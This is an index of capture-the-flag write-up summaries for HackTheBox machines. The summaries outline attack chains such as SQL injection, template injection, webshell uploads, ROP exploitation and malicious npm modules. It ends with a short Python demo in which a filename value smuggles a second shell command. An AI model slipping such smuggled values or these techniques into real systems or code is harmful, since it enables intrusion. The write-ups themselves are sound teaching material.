def sum(x,y): """Simple function returns the sum of the arguments""" return x+y
creates a new piece of data (the code to sum together
x and
y), and
places that code into a container (the variable
sum). When we
then typed
a = sum
we copied the code data from
sum and placed it into the variable
a.
Now both
a and
sum contain (or point to) the same data, i.e. the same
code that sums together the two arguments (e.g.
sum(3,7) and
a(3,7)
will call the same code, and give the same result).
This means that “code of a function” is a type, in the same way that “integer”, “string” and “floating point number” are types.
Properties of a Function
Just as “integer” and “string” have properties, so to does “function”. Type into ipython
sum.__[TAB]
(where
[TAB] means that you should press the tab key)
This should show something like
sum.__call__ sum.__dict__ sum.__hash__ sum.__reduce_ex__ sum.__class__ sum.__doc__ sum.__init__ sum.__repr__ sum.__closure__ sum.__format__ sum.__module__ sum.__setattr__ sum.__code__ sum.__get__ sum.__name__ sum.__sizeof__ sum.__defaults__ sum.__getattribute__ sum.__new__ sum.__str__ sum.__delattr__ sum.__globals__ sum.__reduce__ sum.__subclasshook__
(exactly what you see will depend on your version of python)
This is the list of properties (functions and variables) of a function. The most
interesting variables are
__name__ and
__doc__. Try typing
print(sum.__name__) print(sum.__doc__)
From the output, can you guess what these two variables contain?
Functions as Arguments
As well as assigning functions to variables, you can also pass functions as arguments. Type this into ipython;
def call_function( func, arg1, arg2 ): """Simple function that calls the function 'func' with arguments 'arg1' and 'arg2', returning the result""" return func(arg1, arg2) result = call_function( sum, 3, 7 ) print(result)
This should print out
10. Can you see why?
The function
call_function takes three arguments. The first
is the function to be called. The second two arguments are
the arguments that will be passed to that function. The
code in
call_function simply calls
func using the
arguments
arg1 and
arg2. So far, so useless…
However, let us now create another function, called difference. Please type into ipython
def diff(x, y): """Simple function that returns the difference of its arguments""" return x-y
and then type
result = call_function(diff, 9, 2) print(result)
What do you now see? What has happened here?
Now we have passed
diff to
call_function,
and so
func(arg1,arg2) has used the code contained
in
diff, e.g. calculating the difference of the
two numbers. The result,
7, should be printed.
You are probably now wondering how has this helped? Well,
let us now change
call_function. Please type into ipython
def call_function(func, arg1, arg2): """Simple function that returns the difference of its arguments""" print("Calling function %s with arguments %s and %s." % \ (func.__name__, arg1, arg2) ) result = func(arg1, arg2) print("The result is %s" % result) return result
Now type
result = call_function(sum, 3, 7)
You should see printed to the screen
Calling function sum with arguments 3 and 7. The result is 10
Now try
result = call_function(diff, 9, 2)
You should now see
Calling function diff with arguments 9 and 2. The result is 7
The new
call_function is now doing something useful. It is
printing out extra information about our functions, and can
do that for any function (which accepts two arguments) that
we pass. For example, now type
def multiply(x, y): """Simple function that returns the multiple of the two arguments""" return x * y result = call_function( multiply, 4, 5 )
You should see
Calling function multiply with arguments 4 and 5. The result is 20 | https://chryswoods.com/parallel_python/functions.html | CC-MAIN-2018-17 | refinedweb | 937 | 72.05 |
Working with Dates and Times
This document is meant to provide on overview of the assumptions and limitations of the driver time handling, the reasoning behind it, and describe approaches to working with these types.
timestamps (Cassandra DateType)
Timestamps in Cassandra are timezone-naive timestamps encoded as millseconds since UNIX epoch. Clients working with timestamps in this database usually find it easiest to reason about them if they are always assumed to be UTC. To quote the pytz documentation, “The preferred way of dealing with times is to always work in UTC, converting to localtime only when generating output to be read by humans.” The driver adheres to this tenant, and assumes UTC is always in the database. The driver attempts to make this correct on the way in, and assumes no timezone on the way out.
Write Path
When inserting timestamps, the driver handles serialization for the write path as follows:
If the input is a
datetime.datetime, the serialization is normalized by starting with the
utctimetuple() of the
value.
If the
datetimeobject is timezone-aware, the timestamp is shifted, and represents the UTC timestamp equivalent.
If the
datetimeobject is timezone-naive, this results in no shift – any
datetimewith no timezone information is assumed to be UTC
Note the second point above applies even to “local” times created using
now():
>>> d = datetime.now() >>> print(d.tzinfo) None
These do not contain timezone information intrinsically, so they will be assumed to be UTC and not shifted. When generating
timestamps in the application, it is clearer to use
datetime.utcnow() to be explicit about it.
If the input for a timestamp is numeric, it is assumed to be a epoch-relative millisecond timestamp, as specified in the CQL spec – no scaling or conversion is done.
Read Path
The driver always assumes persisted timestamps are UTC and makes no attempt to localize them. Returned values are
timezone-naive
datetime.datetime. We follow this approach because the datetime API has deficiencies around daylight
saving time, and the defacto package for handling this is a third-party package (we try to minimize external dependencies
and not make decisions for the integrator).
The decision for how to handle timezones is left to the application. For the most part it is straightforward to apply
localization to the
datetimes returned by queries. One prevalent method is to use pytz for localization:
import pytz user_tz = pytz.timezone('US/Central') timestamp_naive = row.ts timestamp_utc = pytz.utc.localize(timestamp_naive) timestamp_presented = timestamp_utc.astimezone(user_tz)
This is the most robust approach (likely refactored into a function). If it is deemed too cumbersome to apply for all call sites in the application, it is possible to patch the driver with custom deserialization for this type. However, doing this depends depends some on internal APIs and what extensions are present, so we will only mention the possibility, and not spell it out here.
date, time (Cassandra DateType)
Date and time in Cassandra are idealized markers, much like
datetime.date and
datetime.time in the Python standard
library. Unlike these Python implementations, the Cassandra encoding supports much wider ranges. To accommodate these
ranges without overflow, this driver returns these data in custom types:
util.Date and
util.Time.
Write Path
For simple (not prepared) statements, the input values for each of these can be either a string literal or an encoded integer. See Working with dates or Working with time for details on the encoding or string formats.
For prepared statements, the driver accepts anything that can be used to construct the
util.Date or
util.Time classes. See the linked API docs for details.
Read Path
The driver always returns custom types for
date and
time.
The driver returns
util.Date for
date in order to accommodate the wider range of values without overflow.
For applications working within the supported range of [
datetime.MINYEAR,
datetime.MAXYEAR], these are easily
converted to standard
datetime.date insances using
Date.date().
The driver returns
util.Time for
time in order to retain nanosecond precision stored in the database.
For applications not concerned with this level of precision, these are easily converted to standard
datetime.time
insances using
Time.time(). | https://docs.datastax.com/en/developer/python-driver/3.11/dates_and_times/ | CC-MAIN-2020-24 | refinedweb | 692 | 57.27 |
- Date and Time API
- nscd projects
- Translations
- When a test depends on another test, failure in the dependency should cause the depending test to return UNRESOLVED, not FAIL or PASS.
There should be a test that the inttypes.h format macros match the corresponding typedefs. See message.
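One minimal shape such a check could take is sketched below (a hand-written illustration, not an actual glibc test; the function name is made up). It round-trips a value of each exact-width typedef through its PRI* macro; a macro/typedef mismatch would also surface as a -Wformat warning when compiled with warnings enabled:

```c
#include <inttypes.h>
#include <stdio.h>
#include <string.h>

/* Sketch of a format-macro check: print a value of the exact-width
   typedef using its PRI* macro and verify the round-trip.  Returns 0
   on success, nonzero on mismatch.  */
int
check_inttypes_formats (void)
{
  char buf[32];

  int32_t i32 = -123456;
  snprintf (buf, sizeof buf, "%" PRId32, i32);
  if (strcmp (buf, "-123456") != 0)
    return 1;

  uint64_t u64 = UINT64_MAX;
  snprintf (buf, sizeof buf, "%" PRIu64, u64);
  if (strcmp (buf, "18446744073709551615") != 0)
    return 1;

  return 0;
}
```

A real test would mechanically cover every typedef/macro pair from the header, and should be built with -Wformat so mismatches are caught at compile time as well.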
Possibly test-skeleton.c should be split into a part always built with _GNU_SOURCE, built once and linked into all tests, and a minimal part that can be included in tests built for other standards.
Review uses of add_temp_file in tests. Temporary files should be created in the preparation part of a test (do_prepare rather than do_test) where possible so that they are deleted in the case of abnormal termination in the TEST_DIRECT case. In the common case where files are created with mkstemp, moving to creation with create_temp_file, which deals automatically with registering the files with add_temp_file, is a good idea. Uses of create_temp_file also need to be reviewed for being in the preparation part of tests where possible. and for "POSIX".
-, -ffinite-math-only).
Consider more precise conventions for associating bugs with xfailed tests - see
Miscellaneous testsuite issues
- The c++-types tests should cover more types from more headers (preferably, every typedef glibc provides as a public interface, since any such type could be used in C++ code and needs a stable ABI there).
- Cover more standards in the linknamespace tests...
Make check-abi targets generate and combine .sum files. See message.
Tests are generally built with internal headers and with _LIBC defined. As far as possible, tests should be built using only the headers that get installed and without _LIBC defined, so they test something closer to how the installed libraries would be used. (At present, tests can define _ISOMAC if they need to disable most internal header contents.)". Many tests that currently execute could actually be implemented as compilation tests (where testing values of constants).
-.. The reference implementation of the Time Zone Database addresses this by having four new functions declared in <time.h>:
tzalloc accepts a string like "Europe/Moscow" and returns a newly allocated object of type timezone_t that represents the rules for the named time zone.
tzfree frees a timezone_t object.
localtime_rz is like localtime_r except with a timezone_t argument prepended.
mktime_z is like mktime except with a timezone_t argument prepended.
This API is derived from a more-complex API in NetBSD. NetBSD is intending to switch to match the simpler reference API. It is not known if there are any other systems with these primitives other than Minix 3, which uses this part of NetBSD userland..
- Based on the sprof program we need tools to analyze the output. The result should be a link map which specifies in which order the .o files are placed in the shared object. This should help to improve code locality and result in a smaller footprint (in code and data memory) since less pages are only used in small parts.
Security
Build more of glibc with `-fstack-protector`.
Start building glibc with `-fstack-protector-strong`.
Start building glibc with -fsanitize-address and other sanitizers. (See here)
Fix open security bugs. See Security Process.
Update glibc programs (especially nscd) to use Linux namespaces.
Update glibc programs (especially nscd) to use Linux seccomp..
Review existing -Wno- options in makefiles to see if they are still needed, and whether the code in question could be cleaned up to avoid the warnings instead. If needed but the code is maintained in glibc rather than imported from elsewhere, convert to diagnostic pragmas (via the DIAG_* macros) as far as possible..
- non-ex-ports architectures should be more like ex-ports architectures regarding putting configuration information in sysdeps files instead of architecture-independent files. Specifically:
- or -fasynchronous-unwind-tables, make them use makefile variables that relate to the logical reason those options are needed (e.g. "may be cancelled"), as described in) - and similarly for uses of __THROW etc. in function declarations..
Use __NR_* directly in Linux-specific .S files, not SYS_* or SYS_ify. See message.. All such symbols with a good reason to be in the public ABI for new links should have comments in the Versions files explaining the reason.
-)
Review interfaces conditioned on __USE_MISC to see if some should be obsoleted. See message (and some other messages in that thread).
Use <intprops.h> within glibc for integer overflow checks .
Make Glibc buildable with Clang. See GlibcMeetsClang
Various atomics and locking files have conditionals on a macro UP (uniprocessor), which nothing defines. Remove all those conditionals.
Some files have #ifdef or #ifndef conditionals on macros weak_alias and libc_hidden_def from libc-symbols.h. Such conditionals may be a relic of non-ELF support; they should all be removed. (Watch out however for files undefining those macros before including another file; the normal approach is to undefine then redefine with an empty expansion, but you need to make sure there aren't any cases relying on a conditional in the included file.)
Review __libc_* and *_internal function aliases / names (in syscalls.list files and elsewhere) and remove those that are no longer used (no callers for those names). Specific cases to look at include _dl_skip_args_internal and __canonicalize_directory_name_internal.
Remove obsolete linuxthreads references in the source tree.
Remove USE_REGPARMS and define internal_function in a sysdeps header instead. See message.
Develop some automation to ensure that include/ declarations of __* function aliases have the same attributes, use of __THROW etc. as the declarations of the corresponding public interfaces, and fix the issues shown up.
Use typeof where possible for declaring such aliases, with comments when there is some reason the type has to be repeated in the internal header.
Develop some automation to ensure that internal calls have it visible to the compiler that the function is hidden, and fix cases shown up where it is not hidden. See bug 18822 for the i386 case.
- Review public function declarations for more attributes that should be on them.. (This is only actually a problem for variables in arrays, because of the use of -fmerge-all-constants.)
-1814 or any more recent version of the proposed updated bindings.
Support the third part of the IEEE 754-2008 bindings (N18341836.
The tests in pow_test_data in libm-test.inc and auto-libm-test-in should be sorted into a more logical order; there may be duplicates to remove..
- A user-level STREAMS implementation should be available if the kernel does not provide the support. This is a much lower priority job now that STREAMS are optional in XPG.
- More conversion modules for iconv(3). Existing modules should be extended to do things like transliteration if this is wanted. For often used conversion a direct conversion function should be available.
The strptime' function needs to be completed. This includes among other things that it must get teached about timezones. The solution envisioned is to extract the timezones from the ADO timezone specifications. Special care must be given names which are used multiple times. Here the precedence should (probably) be according to the geograhical distance. E.g., the timezone EST should be treated as the Eastern Australia Time' instead of the US `Eastern Standard Time' if the current TZ variable is set to, say, Australia/Canberra or if the current locale is en_AU.. (The std-isoc and std-posix keywords have been added for this purpose.)
-...
nscd projects
Support invalidating more than one database at a time (e.g. nscd -i passwd group hosts services)
Support invalidating all databases (e.g. nscd -I)
Translations
Write translations for the GNU libc message for the so far unsupported languages. GNU libc is fully internationalized and users can immediately benefit from this. Please visit and work with the translation project. | http://sourceware.org/glibc/wiki/Development_Todo/Master?highlight=%28%28Development_Todo%7CEnhancing_malloc%29%29 | CC-MAIN-2016-50 | refinedweb | 1,285 | 56.96 |
set_volume_per_voice man page
set_volume_per_voice — Sets the volume of a voice. Allegro game programming library.
Synopsis
#include <allegro.h>
void set_volume_per_voice(int scale);
Description
By default, Allegro will play a centered sample at half volume on both the left and right channel. A sample panned to the far right or left will be played at maximum volume on that channel only. This is done so you can play a single panned sample without distortion. If you play multiple samples at full volume, the mixing process can result in clipping, a noticeable form of distortion. The more samples, the more likely clipping is to occur, and the more clipping, the worse the output will sound.
If clipping is a problem - or if the output.
Each time you increase the parameter by one, the volume of each voice will halve. For example, if you pass 4, you can play up to 16 centred samples at maximum volume without distortion..
Note: The default behaviour has changed as of Allegro 4.1.15. If you would like the behaviour of earlier versions of Allegro, pass -1 to this function. Allegro will choose a value dependent on the number of voices, so that if you reserve n voices, you can play up to n/2 normalised samples with centre panning without risking distortion. The exception is when you have fewer than 8 voices, where the volume remains the same as for 8 voices. Here are the.
See Also
reserve_voices(3), set_volume(3), install_sound(3), detect_digi_driver(3), detect_midi_driver(3)
Referenced By
reserve_voices(3). | https://www.mankier.com/3/set_volume_per_voice | CC-MAIN-2018-05 | refinedweb | 256 | 65.32 |
The MVP is used for a lot of reasons, but mainly it does a **VERY** nice job of separating business logic from the UI.
M. = Model
V. = View
P. = Presenter
UX. = User Experience ( Web Form in this case)
In this implementation of MVP, Model will not be used. Only V and P with UX. The Model is where your data activity, and other "stuff" goes. This example is just meant to show how to get business logic out of your UX code.();
}
}
I hope this is helpful, and is a good starting point for the pattern.
Interesting. Where would validation take place in this configuration?
Cheers, Pete
This isn't a good MVP pattern.
Using a Label control to render HTML is like using an object variable to store all your variables. It's wrong. Don't do it.
I'm actually working on an ASP.NET project where the original developer uses HTML string builders and Label controls render all his HTML.
Let's not try to wedge MVP into frameworks like ASP.NET that don't support it well. Rather, let's change ASP.NET to support MVP better.
A brief description of the Model section would also be interesting.
Thanks, Dan
This is a good example and easy to understand since I'm just beginning to learn the MVP pattern. I was wondering if you could show an example with the Model so I can complete the picture.
can you also recommend a namespace naming convention for MVP model?
Joe Chung,
I'm not sure I follow. The label control is a simple control in asp.net. The only thing i don't like about this example, is that I stuffed HTML back into the result. In a win forms app, that wouldn't work.
But that's not the point here. the point is to show how to separate the code nicely.
Just because someone misused a control once, doesn't make it a bad control.
The beauty is that since I don't have code behind dictating my UX, i could easily change it to a placeholder, another customer server control, or anything, **WITHOUT** changing my biz logic.
Pete,
Validation is a very interesting question. I get asked this a lot. My first answer is alway, X types of validation, not one, so validation can, and should, live in multiple places.
Here's an example.
The UX as the user to supply a date. I believe that the UX should have some UX validation, to ensure that the date is in-fact valid. Web does this diff than Win, which does it diff than smart client(phone), which again would be different on a cash register. So I think validation of user input should be in the UX. It's UX code. It directly effects the UX and nothing but the UX.
Then I think there should be business validation. Birthday for example, for your current customers, should not be more that 1XX years old. You decide the number, i don't care. This is a business decision on a date, that should be validated in the business code.
Validation Duplication? (nice rhyming)
Some validation will no doubt be duplicated. I'm OK with that - better safe than sorry.
I look at is like this. They're two diff systems. I'm in charge of the Business, and You're in charge of the UX.
It's up to you to create a pretty/nice/working/easy to use UX. If you don't validate the date, I will, and I'll throw and exception for you to catch. (hopefully you'll catch it right?)
Central Validation.
I'm not saying that I'd put validation all over the client code either.
I'd probably create a central routine for the interface like...
public bool ContactUsValidator(IReaderContactUs instance) {
bool result;
/// do some checking on "instance"
return result.
}
Hope that helps.
-=- Scott
I for one appreciate you taking the time out of your schedule to write this blog. You never claimed to offer a "purist" version of MVP. What you *did* accomplish is giving other ASP.NET developers an opportunity to think outside of the box... do something different.
If possible, I would like to see a follow-up blog (part 2) to demonstrate the whole point. Perhaps show screenshots of different UX implementations?
To expand on scott's example, if you needed to validate the user's input before kicking off process, you would want to modify the Interface like so.
public interface IReaderContactUs
{
string Name { get; }
string NameIsValid{set;}
string Email { get; }
string EmailIsValid{set;}
string PhoneNumber { get; }
string PhoneNumberIsValid { set; }
string Message { get; }
string MessageIsValid { set; }
string Result { set; }
This will allow the UI to render whatever it needs when something is invalid. Though to seperate concerns you may want to make an IValidateContactUs and leave the original IReaderContactUs alone.
Brian Leahy,
This is a solution, but you're relying on the client (the UX) to do validation. Depending on the scenario, this may be OK. If you trust the client developer.
And if that's good, I REALLY recommend separating the interfaces. IValidateContactUs.
Opps i biffed that one, no wonder the confusion. I meant to make interfaces like so:
public interface IRequireContactUsValidation
string Name { get; }
string NameIsValid{set;}
string Email { get; }
string EmailIsValid{set;}
string PhoneNumber { get; }
string PhoneNumberIsValid { set; }
string Message { get; }
string MessageIsValid { set; }
string Result { set; }
Where an IValidateContactUs has the method
public void ValidateContactUs();
taking IRequireContactUsValidation in it's constructor.
If the Interface is seperated to an IValidateContactUs that would allow one developer to write the validation logic which is testable, and the UI developer to center on The Validation error display.
So lets say company x has different validation rules from company y. When writing validation rules you would have two concrete implementors of the IValidateContactUs. The UI developer would select which validator to use and which presentor to use, not concerning himself with that logic.
If Customer x wants red circles to display when a field is invalid, then when implementing NameIsValid in the IRequireContactUsValidation(long name i know), he/she would put something like:
NameIsValid { set{ _nameIsInvalidErrorNotice.Visable = value;}}
Where _nameIsInvalidErrorNotice is a control that displays a flashing red circle next to your _txtName textbox.
When customer z looks at the demo application and says, I want that to error to be a popup box, You create new implimentor of IRequireContactUsValidation changing only the implimentation of the IsValid properties. If the rules for validation changes then you make a new IValidateContactUs implementor.
Ug i totally biffed what i ment to say. IValidateContactUs was ment to look like:
IValidateContactUs
void ValidateContactUs();
Implementors would need to take a IReaderContactUs in the constructor.
That way the Implementor of IReaderContactUs would worry about Displaying the errors and not validating the error. Opps.
Hmmm... this is a tough one to recommend. Involved in a project using a very similar type of presenter pattern and it has convoluted the code immensely.
jc, I've been using this pattern, and variations on it for years. And i don't thin there is any convolution going on. Especially when you use the same presenter in more than one place. Then it really pays off.
Yes this is a very good example of learning MVP Pattern. The thing which remains in this is Model and Provider Part.
Model basically concentrate data only.And again which is going to be filled by presenter. Model is present inside the View.
Provider is the one which is used to get Data from the Web Services in Asp.Net and fills the Model and give that to Presenter and then presenter provide back that to UI.
With the help of the INETA.org speakers bureau, I've made my way to St. Louis to talk to the local user
Nice example Scott.
Here's another great discussion about the design pattern presented here.
polymorphicpodcast.com/.../mv%2Dpatterns
Enjoy!
Scott,
I just finished listening to your DNR interview.
The one thing you mentioned that I had not considered was the reuse of a presenter. Your example was: you would need a presenter to fetch and display a set of questions, but you could then reuse that presenter for a page to edit those questions because you still need to fetch and display them.
In this type of reuse, would you define more than 1 type of presenter in the Init of the webfore (i.e. fetchPresenter and editPresenter) and then call into each one depending on the situation?
Chris May,
You have to ask this question. Are you ever going to use the updatePresenter in a place that the readPresenter is not used?
Two scenarios, two solutions. Let's say you decide that they're always going to be coupled. You think that the edit form, always needs to be read first, to supply the original values. In this case you can use inheritance and the updateView and inherit from the readView.
This breaks down when you look at the single point of responsibility though. now you have a presenter that forces you to both do reads and updates.
And it breaks when you want to do something like a web service that takes data for an update. The web service shouldn't be forced to fetch the data first to update it.
So I keep the read and the update as separate concerns. Then yes, to answer your question, I establish the null presenter in the body of the page
(same place as ... private ContactUsPresenter presenter; in the above code example)
Then you can initialize them in the oninit, or closer to the point of use.
Thanks Scott!
Pingback from The Usual Dosage » Post Topic » Why MVP Is and Isn???t the Answer
This is really a very helpful example.
MVP >>now seems very easy for me to implement.
Thanks
Never call the presenter direct like you are doing with presenter.ProcessForm();.
So instead of this direct call. Create an eventhandler.
The presenter subscribes on this event that the page code behind makes.
You want a loose connection between the UI and presenter. For nunit testing purposes.
For the validation you can use validation on the page that is connected to validation on the domain objects.
Use the enterprise validation.
A validation is made before saving the anything to layers below.
Then a validation can be made in lower layers also. If access to lower layers through other ways than the presenter. Maybe through web services.
In some cases a direct validation can be preferred in the UI. So that the user does not have to fill in everything and then notice what is missing.
But every pattern can be adjusted for your own special needs. It is all up to you.
Pingback from ASP.NET MVC Archived Buzz, Page 1
Pingback from ASP.NET MVC Archived Blog Posts, Page 1
How can we create a test case with this example using NUnit ?
Hi, I am new in MVP, I have a question here, Can i use DTO here insteed of Interfaces or why didn't you use DTP here because DTO common amoung all the layers.
Technically you can use a DTO, or anything else that would create your contract. BUT ... it's a bad idea. If you use a DTO you're forced to actually have an object to send around.
The reason the Interface is so nice is because you don't know (or care) about the implementation, you just care that it is implemented.
Hello,
If I don't use a DTO, how would I display things like a grid or a list? I would kinda need to pass some kind of object because transforming all that do simple type is going to be a bit messy. I was thinking of something in the line of list<Customer> for example. Also, I think that would fall within the line of the ViewModel idea that is being toss around in the past couple of years. | http://weblogs.asp.net/scottcate/archive/2007/04/12/very-quick-mvp-pattern-to-use-with-asp-net.aspx | crawl-002 | refinedweb | 2,010 | 66.54 |
Source code for the CMS6R2 built in workflows
EPiServer CMS6 R2 is shipped with four built in workflows (the same workflows that has been shipped with CMS since version 5). The workflows that are built in are two variants of page approval workflows, on request for feedback workflow and one request for translation workflow.
We share the source code for the built in workflows both so partners can change the behavior of the workflows and also serve as an inspiration for your own implementations.
Here is the source code for the CMS 6R2 versions of the workflows.
In the old post where the CMS5 versions of the source code where shared there is also a document that describes how to deploy them to a site. That document is still valid except for some namespace changes.
Nice! Thanks for posting an update. :)
Just wanted to supplement this with a link to Mark Everard's blog where he shows you how to create custom workflows for EPiServer CMS:
Hi,
Can you please let me know how to integrate the workflow in existing Episerver CMS R2.
Following things I Changed.
1) in EPiserver.config file.
2) Uploaded Dll files in the bin folder.
3) Able to view the Workflow, but when triggering. getting the below error in start parameter.
Could not load the given control from/util/WorkflowsUI/WorkflowApprovalStart.ascx:Unknown server tag 'EPiServerWorkflow:History'.
Thanks in advance. | https://world.optimizely.com/blogs/Johan-Bjornfot/Dates1/2011/8/Source-code-for-the-CMS6R2-built-in-workflows/ | CC-MAIN-2021-49 | refinedweb | 235 | 73.98 |
HTB: Seventeen
ctf htb-seventeen hackthebox nmap feroxbuster wfuzz vhost exam-management-system searchsploit sqli boolean-based-sqli sqlmap crackstation roundcube cve-2020-12640 upload burp burp-proxy docker credentials password-reuse javascript node npm verdaccio home-env malicious-node-module htb-blunder
Seventeen presented a bunch of virtual hosts, each of which added some piece to eventually land execution. The exam site has a boolean-based SQL injection that provides access to the database, which leaks another virtual host and its DB. The oldmanagement system provides file upload, and leaks the hostname of a Roundcube webmail instance. I’ll upload a webshell and exploit CVE-2020-12640 in Roundcube to include it and get execution. There are two pivots of password reuse, before getting root by installing a malicious Node module from a rogue NPM server. In Beyond Root, I’ll look at why root uses the .npmrc file from kavi’s home directory, and an unintended bypass of the htaccess file for webshell execution.
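The extraction loop at the heart of a boolean-based blind injection like this is worth sketching. This is a minimal simulation: the oracle here is a local lambda standing in for the HTTP request a manual script (or sqlmap) would send, and the payload in the comment is illustrative, not the one used on the box.

```python
import string

def extract_via_oracle(oracle, max_len=64):
    """Recover a hidden string one character at a time using a boolean
    oracle: oracle(position, char) -> True/False. This mirrors what a
    boolean-based blind SQLi loop does with payloads along the lines of
    ' AND SUBSTRING(password,{i},1)='{c}'-- - and checking whether the
    page responds like "true" or "false"."""
    recovered = ""
    for i in range(1, max_len + 1):
        for c in string.printable:
            if oracle(i, c):
                recovered += c
                break
        else:
            break  # no character matched at this position: end of string
    return recovered

# Simulated target; in a real attack this lambda would be an HTTP request.
SECRET = "s3cr3t_hash"
fake_oracle = lambda pos, ch: pos <= len(SECRET) and SECRET[pos - 1] == ch

print(extract_via_oracle(fake_oracle))  # -> s3cr3t_hash
```

A real implementation would binary-search over the character's ordinal instead of trying each printable character, cutting requests from ~100 per character to 7.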
HTB: StreamIO
hackthebox htb-streamio ctf nmap windows domain-controller php wfuzz vhosts crackmapexec feroxbuster sqli sqli-union waf hashcat hydra lfi rfi burp burp-repeater mssql sqlcmd evil-winrm firefox firepwd bloodhound bloodhound-python laps htb-hancliffe
StreamIO is a Windows host running PHP but with MSSQL as the database. It starts with an SQL injection, giving admin access to a website. Then there’s a weird file include in a hidden debug parameter, which eventually gets a remote file include giving execution and a foothold. With that I’ll gain high-privileged access to the DB, and find another password in a backup table. From that user, I’ll fetch saved Firefox credentials, and use those to read a LAPS password and get an administrator shell.
HTB: Scanned
ctf hackthebox htb-scanned nmap django source-code chroot jail sandbox-escape makefile ptrace fork dumbable c python youtube hashcat shared-object
HTB: Noter
ctf hackthebox htb-noter nmap ftp python flask flask-cookie flask-unsign feroxbuster wfuzz source-code md-to-pdf command-injection mysql raptor shared-object
Noter starts by registering an account on the website and looking at the Flask cookie. It’s crackable, but I don’t have another user’s name or anything else of value to fake. I’ll show a couple of different ways to find a username, by generating tons of valid cookies and testing them, and by using the login error messages to find a valid username. With access as a higher priv user on the website, I get creds to the FTP server, where I find the default password scheme, and use that to pivot to the FTP admin. As admin, I get the site source, and find an RCE, both the intended way exploiting a markdown to PDF JavaScript library, as well as an unintended command injection. To get root, I’ll find MySQL running as root and use the Raptor exploit to get command execution through MySQL.
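Reading a Flask cookie doesn't require the signing secret at all, since the payload is only signed, not encrypted. This sketch is roughly what `flask-unsign --decode` does; the demo cookie and its `username` field are invented for illustration.

```python
import base64
import json
import zlib

def decode_flask_cookie(cookie):
    """Decode the payload of a Flask session cookie without knowing the
    signing secret. The cookie is payload.timestamp.signature, each part
    base64url-encoded; a leading '.' means the payload is zlib-compressed."""
    compressed = cookie.startswith(".")
    payload = cookie.lstrip(".").split(".")[0]
    data = base64.urlsafe_b64decode(payload + "=" * (-len(payload) % 4))
    if compressed:
        data = zlib.decompress(data)
    return json.loads(data)

# Build a demo cookie (made-up session contents, fake timestamp/signature).
body = base64.urlsafe_b64encode(
    json.dumps({"logged_in": True, "username": "blue"}).encode()
).rstrip(b"=").decode()
demo = body + ".Yf5qQw.fake-signature"

print(decode_flask_cookie(demo))  # -> {'logged_in': True, 'username': 'blue'}
```

Forging a cookie for a different user is the reverse operation, but that does require brute-forcing the secret so the new signature validates.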
HTB: Talkative
hackthebox ctf htb-talkative nmap wfuzz jamovi bolt-cms feroxbuster rocket-chat r-lang docker webhook twig ssti mongo deepce shocker cap-dac-read-search htb-paper htb-anubis htb-registry
Talkative is about hacking a communications platform. I’ll start by abusing the built-in R scripter in jamovi to get execution and shell in a docker container. There I’ll find creds for the Bolt CMS instance, and use those to log into the admin panel and edit a template to get code execution in the next container. From that container, I can SSH into the main host. From the host, I’ll find a different network of containers, and find MongoDB running in one. I’ll connect to that and use it to get access as admin for a Rocket Chat instance. I’ll abuse the Rocket Chat webhook functionality to get a shell in yet another Docker container. This container has a dangerous capability, CAP_DAC_READ_SEARCH, which I’ll abuse to both read and write files on the host.
HTB: Timelapse
ctf htb-timelapse hackthebox nmap windows active-directory crackmapexec smbclient laps zip2john john pfx2john evil-winrm winrm-keys powershell-history htb-pivotapi
Timelapse is a really nice introduction level active directory box. It starts by finding a set of keys used for authentication to the Windows host on an SMB share. I’ll crack the zip and the keys within, and use Evil-WinRM differently than I have shown before to authenticate to Timelapse using the keys. As the initial user, I’ll find creds in the PowerShell history file for the next user. That user can read from LAPS, the technology that helps to keep local administrator passwords safe and unique. With that read access, I’ll get the administrator password and use Evil-WinRM to get a shell.
HTB: Retired
ctf hackthebox htb-retired nmap feroxbuster upload directory-traversal local-file-read filter bof wfuzz ghidra reverse-engineering proc maps gdb pattern mprotect rop jmp-rsp msfvenom shellcode python symlink make capabilities cap-dac-override binfmt-misc sched_debug htb-previse htb-fingerprint execute-after-redirect
Retired starts out with a file read plus a directory traversal vulnerability. (There’s also an EAR vulnerability that I originally missed, but added in later). With that, I’ll get a copy of a binary that gets fed a file via an upload on the website. There’s a buffer overflow, which I can exploit via an uploaded file. I’ll use ROP to make the stack executable, and then run a reverse shell shellcode from it. With a shell, I’ll throw a symlink into a backup directory and get an SSH key from the user. To get root, I’ll abuse binfmt_misc. In Beyond Root, some loose ends that were annoying me.
HTB: Overgraph
htb-overgraph ctf hackthebox nmap wfuzz vhosts feroxbuster graphql angularjs otp nosql-injection graphql-playground graphql-voyager local-storage csti xss reflective-xss csrf ffmpeg ssrf local-file-read exploit patchelf ghidra checksec python gdb youtube pwntools
HTB: Late
htb-late ctf hackthebox nmap ocr flask kolourpaint tesseract burp-repeater ssti jinja2 payloadsallthethings linpeas pspy bash chattr lsattr extended-attributes youtube
Late really had two steps. The first is to find a online image OCR website that is vulnerable to server-side template injection (SSTI) via the OCRed text in the image. This is relatively simple to find, but getting the fonts correct to exploit the vulnerability is a bit tricky. Still, some trial and error pays off, and results in a shell. From there, I’ll identify a script that’s running whenever someone logs in over SSH. The current user has append access to the file, and therefore I can add a malicious line to the script and connect over SSH to get execution as root. In Beyond Root, a YouTube video showing basic analysis of the webserver, from NGINX to Gunicorn to Python Flask.
HTB: Catch
ctf hackthebox htb-catch nmap apk android feroxbuster gitea swagger lets-chat cachet jadx mobsf api cve-2021-39172 burp burp-repeater wireshark redis php-deserialization deserialization phpggc laravel cve-2021-39174 cve-2021-39165 sqli ssti sqlmap docker bash command-injection apktool htb-routerspace flare-on-flarebear
Catch requires finding an API token in an Android application, and using that to leak credentials from a chat server. Those credentials provide access to multiple CVEs in a Cachet instance, providing several different paths to a shell. The intended and most interesting path is to inject into a configuration file, setting my host as the redis server, and storing a malicious serialized PHP object in that server to get execution. To escalate to root, I’ll abuse a command injection vulnerability in a Bash script that is checking APK files by giving an application a malicious name field.
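The injection pattern behind that malicious name field is easy to demonstrate outside the box. In this sketch (the filename and the "checking" command are invented, not taken from Catch's script), interpolating an attacker-controlled name into a shell string is exploitable, while passing it as a single argv element is not:

```python
import subprocess

# Attacker-controlled "name" field carrying a shell metacharacter payload.
apk_name = 'app.apk; echo INJECTED'

# Vulnerable pattern: the name is interpolated into a string that a
# shell parses, so the ';' terminates the command and runs the payload.
out_vuln = subprocess.run(f"echo checking {apk_name}",
                          shell=True, capture_output=True, text=True).stdout

# Safe pattern: the name is one argv element, never parsed by a shell.
out_safe = subprocess.run(["echo", "checking", apk_name],
                          capture_output=True, text=True).stdout

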